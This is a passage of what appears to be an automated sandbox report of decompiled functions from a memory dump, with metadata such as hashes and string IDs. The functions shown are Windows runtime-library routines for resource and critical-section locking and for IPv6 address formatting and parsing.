                                          												E007A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                          												E007A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                          												_t128 = _t128 + 1;
                                          												_t159 = _t158 + 0x28;
                                          												__eflags = _t128 - 2;
                                          												if(__eflags > 0) {
                                          													E007D217A(_t107, __eflags, _t96);
                                          												}
                                          												_push("RTL: Re-Waiting\n");
                                          												_push(0);
                                          												_push(0x65);
                                          												E007A3F92();
                                          												_t158 = _t159 + 0xc;
                                          											}
                                          											__eflags = _t58;
                                          											if(__eflags < 0) {
                                          												_push(_t58);
                                          												E00793915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                          												asm("int3");
                                          												_t61 =  *_t107;
                                          												 *_t107 = 0;
                                          												__eflags = _t61;
                                          												if(_t61 == 0) {
                                          													L1:
                                          													_t63 = E00775384(_t138 + 0x24);
                                          													if(_t63 != 0) {
                                          														goto L52;
                                          													} else {
                                          														goto L2;
                                          													}
                                          												} else {
                                          													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                          													_push( &_a4);
                                          													_push(_t61);
                                          													_t70 = E0074F970( *((intOrPtr*)(_t138 + 0x18)));
                                          													__eflags = _t70;
                                          													if(__eflags >= 0) {
                                          														goto L1;
                                          													} else {
                                          														_push(_t70);
                                          														E00793915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                          														L52:
                                          														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                          														_push( &_a4);
                                          														_push(1);
                                          														_t63 = E0074F970( *((intOrPtr*)(_t138 + 0x20)));
                                          														__eflags = _t63;
                                          														if(__eflags >= 0) {
                                          															L2:
                                          															return _t63;
                                          														} else {
                                          															_push(_t63);
                                          															E00793915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                          															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                          															_push( &_a4);
                                          															_push(1);
                                          															_t63 = E0074F970( *((intOrPtr*)(_t138 + 0x20)));
                                          															__eflags = _t63;
                                          															if(__eflags >= 0) {
                                          																goto L2;
                                          															} else {
                                          																_push(_t63);
                                          																_t66 = E00793915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                          																asm("int3");
                                          																while(1) {
                                          																	_t110 = _t66;
                                          																	__eflags = _t66 - 1;
                                          																	if(_t66 != 1) {
                                          																		break;
                                          																	}
                                          																	_t128 = _t128 | 0xffffffff;
                                          																	_t66 = _t110;
                                          																	asm("lock cmpxchg [ebx], edi");
                                          																	__eflags = _t66 - _t110;
                                          																	if(_t66 != _t110) {
                                          																		continue;
                                          																	} else {
                                          																		_t67 =  *[fs:0x18];
                                          																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                          																		return _t67;
                                          																	}
                                          																	goto L59;
                                          																}
                                          																E00775329(_t110, _t138);
                                          																_t69 = E007753A5(_t138, 1);
                                          																return _t69;
                                          															}
                                          														}
                                          													}
                                          												}
                                          											} else {
                                          												_t56 =  *(_t96 + 0x28);
                                          												goto L3;
                                          											}
                                          										} else {
                                          											_t107 =  *_t119;
                                          											__eflags = _t107;
                                          											if(__eflags > 0) {
                                          												while(1) {
                                          													_t81 = _t107;
                                          													asm("lock cmpxchg [edi], esi");
                                          													__eflags = _t81 - _t107;
                                          													if(_t81 == _t107) {
                                          														break;
                                          													}
                                          													_t107 = _t81;
                                          													__eflags = _t81;
                                          													if(_t81 > 0) {
                                          														continue;
                                          													}
                                          													break;
                                          												}
                                          												_t56 = _a4;
                                          												__eflags = _t107;
                                          											}
                                          											if(__eflags != 0) {
                                          												while(1) {
                                          													L3:
                                          													__eflags = _t56;
                                          													if(_t56 != 0) {
                                          														goto L32;
                                          													}
                                          													_t107 = _t107 | 0xffffffff;
                                          													_t56 = 0;
                                          													asm("lock cmpxchg [edx], ecx");
                                          													__eflags = 0;
                                          													if(0 != 0) {
                                          														continue;
                                          													} else {
                                          														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          														return 1;
                                          													}
                                          													goto L59;
                                          												}
                                          												continue;
                                          											} else {
                                          												goto L40;
                                          											}
                                          										}
                                          										goto L59;
                                          									}
                                          									__eflags = 0;
                                          									return 0;
                                          								} else {
                                          									_t115 =  *(_t96 + 0x28);
                                          									continue;
                                          								}
                                          							} else {
                                          								_t106 =  *_t49;
                                          								__eflags = _t106;
                                          								if(__eflags > 0) {
                                          									while(1) {
                                          										_t93 = _t106;
                                          										asm("lock cmpxchg [edi], esi");
                                          										__eflags = _t93 - _t106;
                                          										if(_t93 == _t106) {
                                          											break;
                                          										}
                                          										_t106 = _t93;
                                          										__eflags = _t93;
                                          										if(_t93 > 0) {
                                          											continue;
                                          										}
                                          										break;
                                          									}
                                          									__eflags = _t106;
                                          								}
                                          								if(__eflags != 0) {
                                          									continue;
                                          								} else {
                                          									goto L23;
                                          								}
                                          							}
                                          						}
                                          						goto L59;
                                          					}
                                          					_t84 = _t115;
                                          					asm("lock cmpxchg [esi], ecx");
                                          					__eflags = _t84 - _t115;
                                          					if(_t84 != _t115) {
                                          						_t115 = _t84;
                                          						goto L7;
                                          					} else {
                                          						return 1;
                                          					}
                                          				}
                                          				L59:
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B2206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: 7bac8249b0c8a9c0adcf57aa208406712ee3091931d9a57119103de46ffa3001
                                          • Instruction ID: a62f9aeb2d7069c87f0c8695fbf6f89927c9fdf10379f9a1149d0bfdbfc04e07
                                          • Opcode Fuzzy Hash: 7bac8249b0c8a9c0adcf57aa208406712ee3091931d9a57119103de46ffa3001
                                          • Instruction Fuzzy Hash: B5513B71701205AFEB14CE18DC86FE633A9AB94715F218229FD54DF286DA79EC428B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E007914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                          				signed int _v8;
                                          				char _v10;
                                          				char _v140;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t24;
                                          				void* _t26;
                                          				signed int _t29;
                                          				signed int _t34;
                                          				signed int _t40;
                                          				intOrPtr _t45;
                                          				void* _t51;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				signed int _t57;
                                          				void* _t58;
                                          
                                          				_t51 = __edx;
                                          				_t24 =  *0x832088; // 0x76c6953a
                                          				_v8 = _t24 ^ _t57;
                                          				_t45 = _a16;
                                          				_t53 = _a4;
                                          				_t52 = _a20;
                                          				if(_a4 == 0 || _t52 == 0) {
                                          					L10:
                                          					_t26 = 0xc000000d;
                                          				} else {
                                          					if(_t45 == 0) {
                                          						if( *_t52 == _t45) {
                                          							goto L3;
                                          						} else {
                                          							goto L10;
                                          						}
                                          					} else {
                                          						L3:
                                          						_t28 =  &_v140;
                                          						if(_a12 != 0) {
                                          							_push("[");
                                          							_push(0x41);
                                          							_push( &_v140);
                                          							_t29 = E00787707();
                                          							_t58 = _t58 + 0xc;
                                          							_t28 = _t57 + _t29 * 2 - 0x88;
                                          						}
                                          						_t54 = E007913CB(_t53, _t28);
                                          						if(_a8 != 0) {
                                          							_t34 = E00787707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                          							_t58 = _t58 + 0x10;
                                          							_t54 = _t54 + _t34 * 2;
                                          						}
                                          						if(_a12 != 0) {
                                          							_t40 = E00787707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                          							_t58 = _t58 + 0x10;
                                          							_t54 = _t54 + _t40 * 2;
                                          						}
                                          						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                          						 *_t52 = _t53;
                                          						if( *_t52 < _t53) {
                                          							goto L10;
                                          						} else {
                                          							E00752340(_t45,  &_v140, _t53 + _t53);
                                          							_t26 = 0;
                                          						}
                                          					}
                                          				}
                                          				return E0075E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                          			}


                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 007BEA22
                                            • Part of subcall function 007913CB: ___swprintf_l.LIBCMT ref: 0079146B
                                            • Part of subcall function 007913CB: ___swprintf_l.LIBCMT ref: 00791490
                                          • ___swprintf_l.LIBCMT ref: 0079156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 144638e4230dea4350305ae66896b8f0d4ca5483c8d557f8b048c0677100a2fa
                                          • Instruction ID: 96b89cf3bec01f04af9cbe77cba7ec42d8354870ed29bebd58194497afea65b8
                                          • Opcode Fuzzy Hash: 144638e4230dea4350305ae66896b8f0d4ca5483c8d557f8b048c0677100a2fa
                                          • Instruction Fuzzy Hash: 0E21B17290061ADBCF20EE54DC45AEA73BCAB50701F964451FD46D3241EB78EA688BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 45%
                                          			E007753A5(signed int _a4, char _a8) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t32;
                                          				signed int _t37;
                                          				signed int _t40;
                                          				signed int _t42;
                                          				void* _t45;
                                          				intOrPtr _t46;
                                          				void* _t48;
                                          				signed int _t49;
                                          				void* _t51;
                                          				signed int _t57;
                                          				signed int _t64;
                                          				signed int _t71;
                                          				void* _t74;
                                          				intOrPtr _t78;
                                          				signed int* _t79;
                                          				void* _t85;
                                          				signed int _t86;
                                          				signed int _t92;
                                          				void* _t104;
                                          				void* _t105;
                                          
                                          				_t64 = _a4;
                                          				_t32 =  *(_t64 + 0x28);
                                          				_t71 = _t64 + 0x28;
                                          				_push(_t92);
                                          				if(_t32 < 0) {
                                          					_t78 =  *[fs:0x18];
                                          					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                          					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                          						goto L3;
                                          					} else {
                                          						__eflags = _t32 | 0xffffffff;
                                          						asm("lock xadd [ecx], eax");
                                          						return 1;
                                          					}
                                          				} else {
                                          					L3:
                                          					_push(_t86);
                                          					while(1) {
                                          						L4:
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							break;
                                          						}
                                          						__eflags = _a8;
                                          						if(_a8 == 0) {
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                          							_t79 = _t64 + 0x24;
                                          							_t71 = 1;
                                          							asm("lock xadd [eax], ecx");
                                          							_t32 =  *(_t64 + 0x28);
                                          							_a4 = _t32;
                                          							__eflags = _t32;
                                          							if(_t32 != 0) {
                                          								L19:
                                          								_t86 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                          									asm("sbb esi, esi");
                                          									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x008301c0;
                                          									_push(_t92);
                                          									_push(0);
                                          									_t37 = E0074F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                          									__eflags = _t37 - 0x102;
                                          									if(_t37 != 0x102) {
                                          										break;
                                          									}
                                          									_t71 =  *(_t92 + 4);
                                          									_t85 =  *_t92;
                                          									_t51 = E00794FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                          									_push(_t85);
                                          									_push(_t51);
                                          									E007A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                          									E007A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                          									_t86 = _t86 + 1;
                                          									_t105 = _t104 + 0x28;
                                          									__eflags = _t86 - 2;
                                          									if(__eflags > 0) {
                                          										E007D217A(_t71, __eflags, _t64);
                                          									}
                                          									_push("RTL: Re-Waiting\n");
                                          									_push(0);
                                          									_push(0x65);
                                          									E007A3F92();
                                          									_t104 = _t105 + 0xc;
                                          								}
                                          								__eflags = _t37;
                                          								if(__eflags < 0) {
                                          									_push(_t37);
                                          									E00793915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                          									asm("int3");
                                          									_t40 =  *_t71;
                                          									 *_t71 = 0;
                                          									__eflags = _t40;
                                          									if(_t40 == 0) {
                                          										L1:
                                          										_t42 = E00775384(_t92 + 0x24);
                                          										if(_t42 != 0) {
                                          											goto L31;
                                          										} else {
                                          											goto L2;
                                          										}
                                          									} else {
                                          										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                          										_push( &_a4);
                                          										_push(_t40);
                                          										_t49 = E0074F970( *((intOrPtr*)(_t92 + 0x18)));
                                          										__eflags = _t49;
                                          										if(__eflags >= 0) {
                                          											goto L1;
                                          										} else {
                                          											_push(_t49);
                                          											E00793915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                          											L31:
                                          											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                          											_push( &_a4);
                                          											_push(1);
                                          											_t42 = E0074F970( *((intOrPtr*)(_t92 + 0x20)));
                                          											__eflags = _t42;
                                          											if(__eflags >= 0) {
                                          												L2:
                                          												return _t42;
                                          											} else {
                                          												_push(_t42);
                                          												E00793915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                          												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                          												_push( &_a4);
                                          												_push(1);
                                          												_t42 = E0074F970( *((intOrPtr*)(_t92 + 0x20)));
                                          												__eflags = _t42;
                                          												if(__eflags >= 0) {
                                          													goto L2;
                                          												} else {
                                          													_push(_t42);
                                          													_t45 = E00793915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                          													asm("int3");
                                          													while(1) {
                                          														_t74 = _t45;
                                          														__eflags = _t45 - 1;
                                          														if(_t45 != 1) {
                                          															break;
                                          														}
                                          														_t86 = _t86 | 0xffffffff;
                                          														_t45 = _t74;
                                          														asm("lock cmpxchg [ebx], edi");
                                          														__eflags = _t45 - _t74;
                                          														if(_t45 != _t74) {
                                          															continue;
                                          														} else {
                                          															_t46 =  *[fs:0x18];
                                          															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                          															return _t46;
                                          														}
                                          														goto L38;
                                          													}
                                          													E00775329(_t74, _t92);
                                          													_push(1);
                                          													_t48 = E007753A5(_t92);
                                          													return _t48;
                                          												}
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									_t32 =  *(_t64 + 0x28);
                                          									continue;
                                          								}
                                          							} else {
                                          								_t71 =  *_t79;
                                          								__eflags = _t71;
                                          								if(__eflags > 0) {
                                          									while(1) {
                                          										_t57 = _t71;
                                          										asm("lock cmpxchg [edi], esi");
                                          										__eflags = _t57 - _t71;
                                          										if(_t57 == _t71) {
                                          											break;
                                          										}
                                          										_t71 = _t57;
                                          										__eflags = _t57;
                                          										if(_t57 > 0) {
                                          											continue;
                                          										}
                                          										break;
                                          									}
                                          									_t32 = _a4;
                                          									__eflags = _t71;
                                          								}
                                          								if(__eflags != 0) {
                                          									continue;
                                          								} else {
                                          									goto L19;
                                          								}
                                          							}
                                          						}
                                          						goto L38;
                                          					}
                                          					_t71 = _t71 | 0xffffffff;
                                          					_t32 = 0;
                                          					asm("lock cmpxchg [edx], ecx");
                                          					__eflags = 0;
                                          					if(0 != 0) {
                                          						goto L4;
                                          					} else {
                                          						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          						return 1;
                                          					}
                                          				}
                                          				L38:
                                          			}

                                          0x00000000
                                          0x007b22b6
                                          0x007b228f
                                          0x00000000
                                          0x007b226d
                                          0x007753cb
                                          0x007753ce
                                          0x007753d0
                                          0x007753d4
                                          0x007753d6
                                          0x00000000
                                          0x007753d8
                                          0x007753e3
                                          0x007753ea
                                          0x007753ea
                                          0x007753d6
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B22F4
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 007B22FC
                                          • RTL: Re-Waiting, xrefs: 007B2328
                                          • RTL: Resource at %p, xrefs: 007B230B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 04aca1f3dfc21f5a97b8d802807952ca750117d8c36d0d8c53947b9835a3465f
                                          • Instruction ID: 02c7fc60bc9a85a45c54080d51785a1ca7a64115a9cfeebe436c28a26a0413fa
                                          • Opcode Fuzzy Hash: 04aca1f3dfc21f5a97b8d802807952ca750117d8c36d0d8c53947b9835a3465f
                                          • Instruction Fuzzy Hash: 74513871601701ABDF10DF68DC85FE673D8EF59364F114229FD08DB282EAA9EC4287A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E0077EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v24;
                                          				intOrPtr* _v28;
                                          				intOrPtr _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				short _v66;
                                          				char _v72;
                                          				void* __esi;
                                          				intOrPtr _t38;
                                          				intOrPtr _t39;
                                          				signed int _t40;
                                          				intOrPtr _t42;
                                          				intOrPtr _t43;
                                          				signed int _t44;
                                          				void* _t46;
                                          				intOrPtr _t48;
                                          				signed int _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr _t53;
                                          				signed char _t67;
                                          				void* _t72;
                                          				intOrPtr _t77;
                                          				intOrPtr* _t80;
                                          				intOrPtr _t84;
                                          				intOrPtr* _t85;
                                          				void* _t91;
                                          				void* _t92;
                                          				void* _t93;
                                          
                                          				_t80 = __edi;
                                          				_t75 = __edx;
                                          				_t70 = __ecx;
                                          				_t84 = _a4;
                                          				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                          					E0076DA92(__ecx, __edx, __eflags, _t84);
                                          					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                          				}
                                          				_push(0);
                                          				__eflags = _t38 - 0xffffffff;
                                          				if(_t38 == 0xffffffff) {
                                          					_t39 =  *0x83793c; // 0x0
                                          					_push(0);
                                          					_push(_t84);
                                          					_t40 = E007516C0(_t39);
                                          				} else {
                                          					_t40 = E0074F9D4(_t38);
                                          				}
                                          				_pop(_t85);
                                          				__eflags = _t40;
                                          				if(__eflags < 0) {
                                          					_push(_t40);
                                          					E00793915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                          					asm("int3");
                                          					while(1) {
                                          						L21:
                                          						_t76 =  *[fs:0x18];
                                          						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                          						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                          						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                          							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                          							_v66 = 0x1722;
                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                          							_t76 =  &_v72;
                                          							_push( &_v72);
                                          							_v28 = _t85;
                                          							_v40 =  *((intOrPtr*)(_t85 + 4));
                                          							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                          							_push(0x10);
                                          							_push(0x20402);
                                          							E007501A4( *0x7ffe0382 & 0x000000ff);
                                          						}
                                          						while(1) {
                                          							_t43 = _v8;
                                          							_push(_t80);
                                          							_push(0);
                                          							__eflags = _t43 - 0xffffffff;
                                          							if(_t43 == 0xffffffff) {
                                          								_t71 =  *0x83793c; // 0x0
                                          								_push(_t85);
                                          								_t44 = E00751F28(_t71);
                                          							} else {
                                          								_t44 = E0074F8CC(_t43);
                                          							}
                                          							__eflags = _t44 - 0x102;
                                          							if(_t44 != 0x102) {
                                          								__eflags = _t44;
                                          								if(__eflags < 0) {
                                          									_push(_t44);
                                          									E00793915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                          									asm("int3");
                                          									E007D2306(_t85);
                                          									__eflags = _t67 & 0x00000002;
                                          									if((_t67 & 0x00000002) != 0) {
                                          										_t7 = _t67 + 2; // 0x4
                                          										_t72 = _t7;
                                          										asm("lock cmpxchg [edi], ecx");
                                          										__eflags = _t67 - _t67;
                                          										if(_t67 == _t67) {
                                          											E0077EC56(_t72, _t76, _t80, _t85);
                                          										}
                                          									}
                                          									return 0;
                                          								} else {
                                          									__eflags = _v24;
                                          									if(_v24 != 0) {
                                          										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                          									}
                                          									return 2;
                                          								}
                                          								goto L36;
                                          							}
                                          							_t77 =  *((intOrPtr*)(_t80 + 4));
                                          							_push(_t67);
                                          							_t46 = E00794FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                          							_push(_t77);
                                          							E007A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                          							_t48 =  *_t85;
                                          							_t92 = _t91 + 0x18;
                                          							__eflags = _t48 - 0xffffffff;
                                          							if(_t48 == 0xffffffff) {
                                          								_t49 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                          							}
                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                          							_push(_t49);
                                          							_t50 = _v12;
                                          							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                          							_push(_t85);
                                          							_push( *((intOrPtr*)(_t85 + 0xc)));
                                          							_push( *((intOrPtr*)(_t50 + 0x24)));
                                          							E007A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                          							_t53 =  *_t85;
                                          							_t93 = _t92 + 0x20;
                                          							_t67 = _t67 + 1;
                                          							__eflags = _t53 - 0xffffffff;
                                          							if(_t53 != 0xffffffff) {
                                          								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                          								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                          							}
                                          							__eflags = _t67 - 2;
                                          							if(_t67 > 2) {
                                          								__eflags = _t85 - 0x8320c0;
                                          								if(_t85 != 0x8320c0) {
                                          									_t76 = _a4;
                                          									__eflags = _a4 - _a8;
                                          									if(__eflags == 0) {
                                          										E007D217A(_t71, __eflags, _t85);
                                          									}
                                          								}
                                          							}
                                          							_push("RTL: Re-Waiting\n");
                                          							_push(0);
                                          							_push(0x65);
                                          							_a8 = _a4;
                                          							E007A3F92();
                                          							_t91 = _t93 + 0xc;
                                          							__eflags =  *0x7ffe0382;
                                          							if( *0x7ffe0382 != 0) {
                                          								goto L21;
                                          							}
                                          						}
                                          						goto L36;
                                          					}
                                          				} else {
                                          					return _t40;
                                          				}
                                          				L36:
                                          			}

                                          Strings
                                          • RTL: Re-Waiting, xrefs: 007B24FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 007B24BD
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 007B248D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: d68769386fea6c23df6dc3977aec7ceaf7128c2ab3601c87ccb3d951986f5da0
                                          • Instruction ID: fdd1458e19d5596474d745791ed4bc1c868b2ae8f575ddb117dc8854d8ff8cbe
                                          • Opcode Fuzzy Hash: d68769386fea6c23df6dc3977aec7ceaf7128c2ab3601c87ccb3d951986f5da0
                                          • Instruction Fuzzy Hash: 1541EAB0600204EFCB20DF64DC89FAA77A9EF44320F208655F9599B2D2D77CED428761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0078FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _t105;
                                          				void* _t110;
                                          				char _t114;
                                          				short _t115;
                                          				void* _t118;
                                          				signed short* _t119;
                                          				short _t120;
                                          				char _t122;
                                          				void* _t127;
                                          				void* _t130;
                                          				signed int _t136;
                                          				intOrPtr _t143;
                                          				signed int _t158;
                                          				signed short* _t164;
                                          				signed int _t167;
                                          				void* _t170;
                                          
                                          				_t158 = 0;
                                          				_t164 = _a4;
                                          				_v20 = 0;
                                          				_v24 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_v16 = 0;
                                          				_v28 = 0;
                                          				_t136 = 0;
                                          				while(1) {
                                          					_t167 =  *_t164 & 0x0000ffff;
                                          					if(_t167 == _t158) {
                                          						break;
                                          					}
                                          					_t118 = _v20 - _t158;
                                          					if(_t118 == 0) {
                                          						if(_t167 == 0x3a) {
                                          							if(_v12 > _t158 || _v8 > _t158) {
                                          								break;
                                          							} else {
                                          								_t119 =  &(_t164[1]);
                                          								if( *_t119 != _t167) {
                                          									break;
                                          								}
                                          								_t143 = 2;
                                          								 *((short*)(_a12 + _t136 * 2)) = 0;
                                          								_v28 = 1;
                                          								_v8 = _t143;
                                          								_t136 = _t136 + 1;
                                          								L47:
                                          								_t164 = _t119;
                                          								_v20 = _t143;
                                          								L14:
                                          								if(_v24 == _t158) {
                                          									L19:
                                          									_t164 =  &(_t164[1]);
                                          									_t158 = 0;
                                          									continue;
                                          								}
                                          								if(_v12 == _t158) {
                                          									if(_v16 > 4) {
                                          										L29:
                                          										return 0xc000000d;
                                          									}
                                          									_t120 = E0078EE02(_v24, _t158, 0x10);
                                          									_t170 = _t170 + 0xc;
                                          									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                          									_t136 = _t136 + 1;
                                          									goto L19;
                                          								}
                                          								if(_v16 > 3) {
                                          									goto L29;
                                          								}
                                          								_t122 = E0078EE02(_v24, _t158, 0xa);
                                          								_t170 = _t170 + 0xc;
                                          								if(_t122 > 0xff) {
                                          									goto L29;
                                          								}
                                          								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
